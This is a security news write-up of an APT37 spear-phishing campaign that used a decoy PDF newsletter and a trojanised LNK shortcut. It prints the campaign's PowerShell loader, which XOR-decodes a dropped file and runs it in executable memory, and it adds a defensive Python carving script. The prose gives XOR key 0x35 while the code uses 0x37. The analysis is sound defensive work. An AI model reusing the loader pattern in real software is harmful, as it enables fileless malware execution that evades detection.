Attackers have begun leveraging a seemingly innocuous PDF newsletter alongside a malicious Windows shortcut (LNK) file to infiltrate enterprise environments.
The attack surfaced in late August 2025, targeting South Korean academic and government institutions under the guise of a legitimate “국가정보연구회 소식지 (52호)” PDF newsletter.
Victims receive an archive containing both the PDF decoy and a companion .lnk file masquerading as the newsletter. When the shortcut is executed, a multi-stage PowerShell loader embedded within the LNK unpacks and deploys additional payloads entirely in memory, evading disk-based detection.
Early analysis revealed that the LNK file hides three binary payloads at specific offsets: a decoy PDF at offset 0x0000102C, a loader binary at 0x0007EDC1, and a final executable at 0x0015AED2.
Upon execution, a PowerShell one-liner within the LNK reads these offsets, writes the binaries to %TEMP% as aio0.dat, aio1.dat, and aio1+3.b+la+t, and then kicks off a batch script (aio03.bat) to decode and run the loader.
Seqrite analysts noted that this fileless technique allows the attackers to bypass signature-based defenses by never writing the final payload to disk.
Subsequent investigation by Seqrite researchers identified that the final payload, once decrypted with a single-byte XOR key (0x35), is injected directly into memory via the Windows API calls GlobalAlloc, VirtualProtect, and CreateThread.
This reflective DLL injection technique ensures that the malicious code executes stealthily, leaving minimal forensic artifacts.
Detailed reverse engineering of the loader binary uncovered environment checks for VMware tools and sandbox-evasion routines that prevent execution in analysis environments, confirming the high sophistication of the threat actor known as APT37.
Campaign 1 infection chain (Source: Seqrite)
# Loader stage recovered by Seqrite: read the XOR-obfuscated payload dropped in %TEMP%,
# decode it in place with a single-byte key, then pass it to Win32 APIs for in-memory execution.
# [Win32] is a P/Invoke wrapper type defined elsewhere in the script; its definition is not part of this excerpt.
$exePath = "$env:temp\tony31.dat"
$exeFile = Get-Content -Path $exePath -Encoding Byte
$key = 0x37
for ($i = 0; $i -lt $exeFile.Length; $i++) {
    $exeFile[$i] = $exeFile[$i] -bxor $key          # single-byte XOR decode
}
$buf = [Win32]::GlobalAlloc(0x40, $exeFile.Length)  # GMEM_ZEROINIT, fixed block
[Win32]::VirtualProtect($buf, $exeFile.Length, 0x40, [ref]$old)  # PAGE_EXECUTE_READWRITE
[Win32]::RtlMoveMemory($buf, $exeFile, $exeFile.Length)
[Win32]::CreateThread(0,0,$buf,0,0,[ref]$null)      # run the decoded buffer as a new thread
Infection Mechanism
The infection begins when the user double-clicks the deceptive .lnk file, which triggers PowerShell under the hood.
Campaign 2 infection chain (Source: Seqrite)
The script parses its own binary content using Get-Item and ReadAllBytes, extracting the decoy PDF for display while staging the real payloads.
Once staged, the batch loader executes Invoke-Expression on a UTF-8 decoded script stored in aio02.dat, which in turn orchestrates the XOR decryption and reflective injection of aio01.dat.
By leveraging in-memory execution, the attackers sidestep conventional endpoint protection platforms that rely on disk-based scanning.
This layered infection chain, combining decoy documents, embedded payloads, and fileless techniques, underlines the evolving sophistication of state-sponsored cyber espionage campaigns.
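As an added triage example (not code from the article or from Seqrite), the Python below carves appended payloads out of an LNK file the way the offset-based layout and single-byte XOR described above suggest: it validates the fixed ShellLink header, locates cleartext PDF and PE signatures past the header, brute-forces single-byte XOR keys to reveal an obfuscated final stage, and recovers a payload at a known offset. The LNK blob, decoy PDF and PE stub are constructed sample data, not the campaign's files.

```python
import re

# Constructed sample data (not the campaign's files): a minimal ShellLink header,
# a cleartext decoy PDF, then a PE stub obfuscated with a single-byte XOR key.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
LNK_HEADER = b"\x4c\x00\x00\x00" + LINK_CLSID + b"\x00" * 60   # 0x4C bytes, other fields zeroed
PDF_DECOY = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n"
PE_STUB = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"This program cannot be run in DOS mode."
XOR_KEY = 0x35
SAMPLE_LNK = LNK_HEADER + b"\x00" * 16 + PDF_DECOY + bytes(b ^ XOR_KEY for b in PE_STUB)

DOS_STUB_TEXT = b"This program cannot be run in DOS mode"


def is_lnk(data: bytes) -> bool:
    """Fixed ShellLink header: HeaderSize 0x0000004C followed by the LinkCLSID."""
    return data[:4] == b"\x4c\x00\x00\x00" and data[4:20] == LINK_CLSID


def find_cleartext_payloads(data: bytes, start: int = 0x4C):
    """Offsets of unobfuscated PDF or PE signatures after the header, as (offset, kind)."""
    hits = []
    for m in re.finditer(rb"%PDF-|MZ", data[start:]):
        kind = "pdf" if m.group().startswith(b"%PDF") else "pe"
        hits.append((m.start() + start, kind))
    return hits


def find_xor_hidden_pe(data: bytes, start: int = 0x4C):
    """Brute-force every single-byte XOR key over the tail; return (offset, key) for each
    candidate 'MZ' that is confirmed by the DOS stub string within the following 256 bytes."""
    hits = []
    tail = data[start:]
    for key in range(1, 256):
        decoded = bytes(b ^ key for b in tail)
        for m in re.finditer(rb"MZ", decoded):
            if DOS_STUB_TEXT in decoded[m.start():m.start() + 0x100]:
                hits.append((m.start() + start, key))
    return hits


def carve(data: bytes, offset: int, length: int, key: int = 0) -> bytes:
    """Recover a payload at a known offset, undoing the single-byte XOR if one was applied."""
    return bytes(b ^ key for b in data[offset:offset + length])


if __name__ == "__main__":
    print("valid LNK header:", is_lnk(SAMPLE_LNK))
    print("cleartext payloads:", find_cleartext_payloads(SAMPLE_LNK))
    for off, key in find_xor_hidden_pe(SAMPLE_LNK):
        print(f"XOR-hidden PE at 0x{off:08X}, key 0x{key:02X}")
```

On a real sample, run the same functions over the file bytes and compare the recovered offsets and key against the ones the report lists; a cleartext PDF followed by an XOR-hidden PE in one shortcut is itself a strong detection signal.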